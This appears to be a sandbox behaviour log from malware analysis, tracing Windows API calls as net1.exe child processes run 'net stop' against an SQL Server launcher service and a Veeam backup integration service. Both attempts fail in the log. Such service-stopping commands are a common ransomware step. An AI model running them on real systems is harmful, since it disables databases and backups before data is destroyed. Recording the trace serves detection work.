returned 0xa90 [0126.087] GetCurrentThreadId () returned 0xb60 [0126.087] GetTickCount () returned 0x1152c2f [0126.087] QueryPerformanceCounter (in: lpPerformanceCount=0x2dfeac | out: lpPerformanceCount=0x2dfeac*=24518802825) returned 1 [0126.087] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0126.087] __set_app_type (_Type=0x1) [0126.087] __p__fmode () returned 0x770331f4 [0126.088] __p__commode () returned 0x770331fc [0126.088] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0126.088] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0126.088] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0126.088] GetConsoleOutputCP () returned 0x1b5 [0126.088] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0126.088] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.131] sprintf_s (in: _DstBuf=0x2dfe6c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0126.131] setlocale (category=0, locale=".437") returned="English_United States.437" [0126.133] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0126.133] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0126.133] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SQL_2008 /y" [0126.133] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2dfc38, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0126.133] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x84) returned 0x354ad8 [0126.133] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0126.134] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2dfe3c | out: Buffer=0x2dfe3c*=0x351b10) returned 0x0 [0126.134] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2dfe3c | out: Buffer=0x2dfe3c*=0x351b28) returned 0x0 [0126.134] _fileno (_File=0x77032900) returned -2 [0126.134] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0126.134] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0126.134] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0126.134] _wcsicmp (_String1="config", _String2="stop") returned -16 [0126.134] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0126.134] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0126.134] _wcsicmp (_String1="file", _String2="stop") returned -13 [0126.134] _wcsicmp (_String1="files", _String2="stop") returned -13 [0126.134] _wcsicmp (_String1="group", _String2="stop") returned -12 [0126.134] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0126.134] _wcsicmp (_String1="help", _String2="stop") returned -11 [0126.134] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0126.134] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0126.134] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0126.134] _wcsicmp (_String1="session", _String2="stop") returned -15 [0126.134] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0126.134] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0126.134] _wcsicmp (_String1="share", _String2="stop") returned -12 [0126.134] _wcsicmp (_String1="start", _String2="stop") returned -14 [0126.134] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0126.134] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0126.134] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0126.134] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$SQL_2008") returned -12 [0126.134] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$SQL_2008") returned -10 [0126.134] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$SQL_2008") returned -10 [0126.134] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$SQL_2008") returned -10 [0126.134] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$SQL_2008") returned -10 [0126.134] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$SQL_2008") returned -7 [0126.134] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$SQL_2008") returned -7 [0126.134] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$SQL_2008") returned -6 [0126.135] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$SQL_2008") returned -6 [0126.135] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$SQL_2008") returned -5 [0126.135] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$SQL_2008") returned -5 [0126.135] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$SQL_2008") returned -1 [0126.135] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$SQL_2008") returned 3 [0126.135] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0126.135] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0126.135] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0126.135] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0126.135] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0126.135] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0126.135] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0126.135] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0126.135] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$SQL_2008") returned 7 [0126.135] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$SQL_2008") returned 8 [0126.135] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$SQL_2008") returned 8 [0126.135] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$SQL_2008") returned -12 [0126.135] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$SQL_2008") returned -14 [0126.135] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$SQL_2008") returned 5 [0126.135] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$SQL_2008") returned 5 [0126.135] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$SQL_2008") returned 1 [0126.135] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$SQL_2008") returned 5 [0126.135] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$SQL_2008") returned 5 [0126.135] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$SQL_2008") returned 5 [0126.135] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$SQL_2008") returned 10 [0126.135] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$SQL_2008") returned 10 [0126.135] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$SQL_2008") returned 10 [0126.135] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$SQL_2008") returned 3 [0126.135] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$SQL_2008") returned -9 [0126.135] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$SQL_2008") returned -1 [0126.135] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0126.135] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0126.135] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0126.135] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$SQL_2008") returned -1 [0126.135] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$SQL_2008") returned -12 [0126.135] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$SQL_2008") returned 1 [0126.136] _wcsupr (in: _String="MSSQLFDLauncher$SQL_2008" | out: _String="MSSQLFDLAUNCHER$SQL_2008") returned="MSSQLFDLAUNCHER$SQL_2008" [0126.136] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3554c0 [0126.614] GetServiceKeyNameW (in: hSCManager=0x3554c0, lpDisplayName="MSSQLFDLAUNCHER$SQL_2008", lpServiceName=0xe5aaf0, lpcchBuffer=0x2dfdd8 | out: lpServiceName="", lpcchBuffer=0x2dfdd8) returned 0 [0126.615] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -12 [0126.615] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -14 [0126.615] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 5 [0126.615] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 5 [0126.615] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 5 [0126.615] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 5 [0126.615] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 5 [0126.615] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 10 [0126.615] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 10 [0126.615] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 10 [0126.615] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 3 [0126.615] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -9 [0126.615] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -1 [0126.615] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 6 [0126.615] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 6 [0126.615] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 6 [0126.615] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -1 [0126.615] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -12 [0126.615] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 1 [0126.615] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$SQL_2008", opcode=0x0, arg=0x0, bufptr=0x2dfdd4 | out: bufptr=0x2dfdd4) returned 0x889 [0126.617] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0126.617] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0126.617] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0126.619] GetFileType (hFile=0x0) returned 0x0 [0126.619] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x353b48 [0126.619] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x353b48, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0126.619] WriteFile (in: hFile=0x0, lpBuffer=0x353b48, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2dfd14, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2dfd14, lpOverlapped=0x0) returned 0 [0126.619] LocalFree (hMem=0x353b48) returned 0x0 [0126.619] GetFileType (hFile=0x0) returned 0x0 [0126.619] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x356178 [0126.619] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x356178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n5", lpUsedDefaultChar=0x0) returned 2 [0126.619] WriteFile (in: hFile=0x0, lpBuffer=0x356178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2dfd14, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2dfd14, lpOverlapped=0x0) returned 0 [0126.619] LocalFree (hMem=0x356178) returned 0x0 [0126.619] _ultow (in: _Dest=0x889, _Radix=3013956 | out: _Dest=0x889) returned="2185" [0126.619] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0126.619] GetFileType (hFile=0x0) returned 0x0 [0126.619] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x356178 [0126.619] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x356178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0126.619] WriteFile (in: hFile=0x0, lpBuffer=0x356178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2dfd20, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2dfd20, lpOverlapped=0x0) returned 0 [0126.619] LocalFree (hMem=0x356178) returned 0x0 [0126.619] GetFileType (hFile=0x0) returned 0x0 [0126.620] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x356178 [0126.620] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x356178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n5", lpUsedDefaultChar=0x0) returned 2 [0126.620] WriteFile (in: hFile=0x0, lpBuffer=0x356178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2dfd20, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2dfd20, lpOverlapped=0x0) returned 0 [0126.620] LocalFree (hMem=0x356178) returned 0x0 [0126.620] NetApiBufferFree (Buffer=0x351b10) returned 0x0 [0126.620] NetApiBufferFree (Buffer=0x351b28) returned 0x0 [0126.620] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SQL_2008 /y" [0126.620] exit (_Code=2) Process: id = "294" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4e589000" os_pid = "0x974" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "139" os_parent_pid = "0x8c4" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamHvIntegrationSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 700 os_tid = 0x63c [0126.165] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf9fc | out: lpSystemTimeAsFileTime=0x1cf9fc*(dwLowDateTime=0x1ef01550, dwHighDateTime=0x1d6f0d1)) [0126.165] GetCurrentProcessId () returned 0x974 [0126.165] GetCurrentThreadId () returned 0x63c [0126.165] GetTickCount () returned 0x1152c7d [0126.165] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf9f4 | out: lpPerformanceCount=0x1cf9f4*=24526566621) returned 1 [0126.165] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0126.165] __set_app_type (_Type=0x1) [0126.165] __p__fmode () returned 0x770331f4 [0126.165] __p__commode () returned 0x770331fc [0126.165] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0126.166] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0126.166] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0126.166] GetConsoleOutputCP () returned 0x1b5 [0126.166] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0126.166] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.170] sprintf_s (in: _DstBuf=0x1cf9b4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0126.170] setlocale (category=0, locale=".437") returned="English_United States.437" [0126.623] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0126.623] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0126.623] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamHvIntegrationSvc /y" [0126.623] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf780, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0126.623] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x7e) returned 0x523af8 [0126.623] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0126.623] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cf984 | out: Buffer=0x1cf984*=0x521b00) returned 0x0 [0126.623] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cf984 | out: Buffer=0x1cf984*=0x521b18) returned 0x0 [0126.623] _fileno (_File=0x77032900) returned -2 [0126.623] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0126.623] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0126.623] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0126.623] _wcsicmp (_String1="config", _String2="stop") returned -16 [0126.623] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0126.623] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0126.623] _wcsicmp (_String1="file", _String2="stop") returned -13 [0126.623] _wcsicmp (_String1="files", _String2="stop") returned -13 [0126.623] _wcsicmp (_String1="group", _String2="stop") returned -12 [0126.624] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0126.624] _wcsicmp (_String1="help", _String2="stop") returned -11 [0126.624] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0126.624] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0126.624] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0126.624] _wcsicmp (_String1="session", _String2="stop") returned -15 [0126.624] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0126.624] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0126.624] _wcsicmp (_String1="share", _String2="stop") returned -12 [0126.624] _wcsicmp (_String1="start", _String2="stop") returned -14 [0126.624] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0126.624] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0126.624] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0126.624] _wcsicmp (_String1="accounts", _String2="VeeamHvIntegrationSvc") returned -21 [0126.624] _wcsicmp (_String1="computer", _String2="VeeamHvIntegrationSvc") returned -19 [0126.624] _wcsicmp (_String1="config", _String2="VeeamHvIntegrationSvc") returned -19 [0126.624] _wcsicmp (_String1="continue", _String2="VeeamHvIntegrationSvc") returned -19 [0126.624] _wcsicmp (_String1="cont", _String2="VeeamHvIntegrationSvc") returned -19 [0126.624] _wcsicmp (_String1="file", _String2="VeeamHvIntegrationSvc") returned -16 [0126.624] _wcsicmp (_String1="files", _String2="VeeamHvIntegrationSvc") returned -16 [0126.624] _wcsicmp (_String1="group", _String2="VeeamHvIntegrationSvc") returned -15 [0126.624] _wcsicmp (_String1="groups", _String2="VeeamHvIntegrationSvc") returned -15 [0126.624] _wcsicmp (_String1="help", _String2="VeeamHvIntegrationSvc") returned -14 [0126.624] _wcsicmp (_String1="helpmsg", _String2="VeeamHvIntegrationSvc") returned -14 [0126.624] _wcsicmp (_String1="localgroup", _String2="VeeamHvIntegrationSvc") returned -10 [0126.624] _wcsicmp (_String1="pause", _String2="VeeamHvIntegrationSvc") returned -6 [0126.624] _wcsicmp (_String1="session", _String2="VeeamHvIntegrationSvc") returned -3 [0126.624] _wcsicmp (_String1="sessions", _String2="VeeamHvIntegrationSvc") returned -3 [0126.624] _wcsicmp (_String1="sess", _String2="VeeamHvIntegrationSvc") returned -3 [0126.624] _wcsicmp (_String1="share", _String2="VeeamHvIntegrationSvc") returned -3 [0126.624] _wcsicmp (_String1="start", _String2="VeeamHvIntegrationSvc") returned -3 [0126.624] _wcsicmp (_String1="stats", _String2="VeeamHvIntegrationSvc") returned -3 [0126.624] _wcsicmp (_String1="statistics", _String2="VeeamHvIntegrationSvc") returned -3 [0126.624] _wcsicmp (_String1="stop", _String2="VeeamHvIntegrationSvc") returned -3 [0126.624] _wcsicmp (_String1="time", _String2="VeeamHvIntegrationSvc") returned -2 [0126.625] _wcsicmp (_String1="user", _String2="VeeamHvIntegrationSvc") returned -1 [0126.625] _wcsicmp (_String1="users", _String2="VeeamHvIntegrationSvc") returned -1 [0126.625] _wcsicmp (_String1="msg", _String2="VeeamHvIntegrationSvc") returned -9 [0126.625] _wcsicmp (_String1="messenger", _String2="VeeamHvIntegrationSvc") returned -9 [0126.625] _wcsicmp (_String1="receiver", _String2="VeeamHvIntegrationSvc") returned -4 [0126.625] _wcsicmp (_String1="rcv", _String2="VeeamHvIntegrationSvc") returned -4 [0126.625] _wcsicmp (_String1="netpopup", _String2="VeeamHvIntegrationSvc") returned -8 [0126.625] _wcsicmp (_String1="redirector", _String2="VeeamHvIntegrationSvc") returned -4 [0126.625] _wcsicmp (_String1="redir", _String2="VeeamHvIntegrationSvc") returned -4 [0126.625] _wcsicmp (_String1="rdr", _String2="VeeamHvIntegrationSvc") returned -4 [0126.625] _wcsicmp (_String1="workstation", _String2="VeeamHvIntegrationSvc") returned 1 [0126.625] _wcsicmp (_String1="work", _String2="VeeamHvIntegrationSvc") returned 1 [0126.625] _wcsicmp (_String1="wksta", _String2="VeeamHvIntegrationSvc") returned 1 [0126.625] _wcsicmp (_String1="prdr", _String2="VeeamHvIntegrationSvc") returned -6 [0126.625] _wcsicmp (_String1="devrdr", _String2="VeeamHvIntegrationSvc") returned -18 [0126.625] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamHvIntegrationSvc") returned -10 [0126.625] _wcsicmp (_String1="server", _String2="VeeamHvIntegrationSvc") returned -3 [0126.625] _wcsicmp (_String1="svr", _String2="VeeamHvIntegrationSvc") returned -3 [0126.625] _wcsicmp (_String1="srv", _String2="VeeamHvIntegrationSvc") returned -3 [0126.625] _wcsicmp (_String1="lanmanserver", _String2="VeeamHvIntegrationSvc") returned -10 [0126.625] _wcsicmp (_String1="alerter", _String2="VeeamHvIntegrationSvc") returned -21 [0126.625] _wcsicmp (_String1="netlogon", _String2="VeeamHvIntegrationSvc") returned -8 [0126.625] _wcsupr (in: _String="VeeamHvIntegrationSvc" | out: _String="VEEAMHVINTEGRATIONSVC") returned="VEEAMHVINTEGRATIONSVC" [0126.625] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5254d8 [0126.629] GetServiceKeyNameW (in: hSCManager=0x5254d8, lpDisplayName="VEEAMHVINTEGRATIONSVC", lpServiceName=0xe5aaf0, lpcchBuffer=0x1cf920 | out: lpServiceName="", lpcchBuffer=0x1cf920) returned 0 [0126.629] _wcsicmp (_String1="msg", _String2="VEEAMHVINTEGRATIONSVC") returned -9 [0126.629] _wcsicmp (_String1="messenger", _String2="VEEAMHVINTEGRATIONSVC") returned -9 [0126.629] _wcsicmp (_String1="receiver", _String2="VEEAMHVINTEGRATIONSVC") returned -4 [0126.629] _wcsicmp (_String1="rcv", _String2="VEEAMHVINTEGRATIONSVC") returned -4 [0126.630] _wcsicmp (_String1="redirector", _String2="VEEAMHVINTEGRATIONSVC") returned -4 [0126.630] _wcsicmp (_String1="redir", _String2="VEEAMHVINTEGRATIONSVC") returned -4 [0126.630] _wcsicmp (_String1="rdr", _String2="VEEAMHVINTEGRATIONSVC") returned -4 [0126.630] _wcsicmp (_String1="workstation", _String2="VEEAMHVINTEGRATIONSVC") returned 1 [0126.630] _wcsicmp (_String1="work", _String2="VEEAMHVINTEGRATIONSVC") returned 1 [0126.630] _wcsicmp (_String1="wksta", _String2="VEEAMHVINTEGRATIONSVC") returned 1 [0126.630] _wcsicmp (_String1="prdr", _String2="VEEAMHVINTEGRATIONSVC") returned -6 [0126.630] _wcsicmp (_String1="devrdr", _String2="VEEAMHVINTEGRATIONSVC") returned -18 [0126.630] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMHVINTEGRATIONSVC") returned -10 [0126.630] _wcsicmp (_String1="server", _String2="VEEAMHVINTEGRATIONSVC") returned -3 [0126.630] _wcsicmp (_String1="svr", _String2="VEEAMHVINTEGRATIONSVC") returned -3 [0126.630] _wcsicmp (_String1="srv", _String2="VEEAMHVINTEGRATIONSVC") returned -3 [0126.630] _wcsicmp (_String1="lanmanserver", _String2="VEEAMHVINTEGRATIONSVC") returned -10 [0126.630] _wcsicmp (_String1="alerter", _String2="VEEAMHVINTEGRATIONSVC") returned -21 [0126.630] _wcsicmp (_String1="netlogon", _String2="VEEAMHVINTEGRATIONSVC") returned -8 [0126.630] NetServiceControl (in: servername=0x0, service="VEEAMHVINTEGRATIONSVC", opcode=0x0, arg=0x0, bufptr=0x1cf91c | out: bufptr=0x1cf91c) returned 0x889 [0126.631] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0126.631] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0126.632] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0126.633] GetFileType (hFile=0x0) returned 0x0 [0126.633] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x523ef8 [0126.633] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x523ef8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nQ", lpUsedDefaultChar=0x0) returned 30 [0126.633] WriteFile (in: hFile=0x0, lpBuffer=0x523ef8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1cf85c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf85c, lpOverlapped=0x0) returned 0 [0126.633] LocalFree (hMem=0x523ef8) returned 0x0 [0126.633] GetFileType (hFile=0x0) returned 0x0 [0126.633] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5261a0 [0126.633] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5261a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nR", lpUsedDefaultChar=0x0) returned 2 [0126.633] WriteFile (in: hFile=0x0, lpBuffer=0x5261a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf85c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf85c, lpOverlapped=0x0) returned 0 [0126.633] LocalFree (hMem=0x5261a0) returned 0x0 [0126.633] _ultow (in: _Dest=0x889, _Radix=1898636 | out: _Dest=0x889) returned="2185" [0126.634] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0126.634] GetFileType (hFile=0x0) returned 0x0 [0126.634] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5261a0 [0126.634] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5261a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 